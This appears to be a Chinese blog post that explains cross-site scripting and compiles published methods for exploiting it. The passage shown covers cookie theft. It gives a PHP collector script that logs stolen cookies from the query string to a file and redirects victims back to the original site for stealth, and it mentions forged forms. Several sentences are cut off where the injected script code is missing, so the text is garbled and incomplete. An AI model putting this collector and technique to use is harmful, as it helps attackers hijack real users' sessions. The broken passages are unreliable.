所谓跨站脚本漏洞,小弟认为是指用户能够在网页上添加任意HTML代码并使其被浏览器执行的漏洞。小弟认为此漏洞跟跨站脚本没有必然联系,只不过此漏洞的通常利用方法都要结合另一站点(通常是可以自己控制的)上的脚本才能完成,故得名。
本文仅收集X档案曾刊登的对此漏洞的利用方法,权当小结,并未进行创新。希望能抛砖引玉,众大虾发现有什么错漏请指正和补充。
一、攻击代码
1、偷取cookie的代码:
注:
(1) 是可以自己控制的脚本,功能是要从页面参数中获得并保存信息(对于本例的“信息”就是cookie)
(2) 一个recordcookie.php样本:
$info = getenv("QUERY_STRING");
if ($info) {
$fp = fopen("info.txt","a");
fwrite($fp,$info."\n");
fclose($fp);
}
header("Location: ");
?>
最后一句转回原来的站点使增加隐蔽性
(3) 如把脚本中的“window.open”替换为“location = ”,则不会打开新窗口,但变成凡进入显示包含该
注:
(1) 由于提交表单会使页面跳转,所以最好把伪造的表单和那段
阅读(731) | 评论(0) | 转发(0) |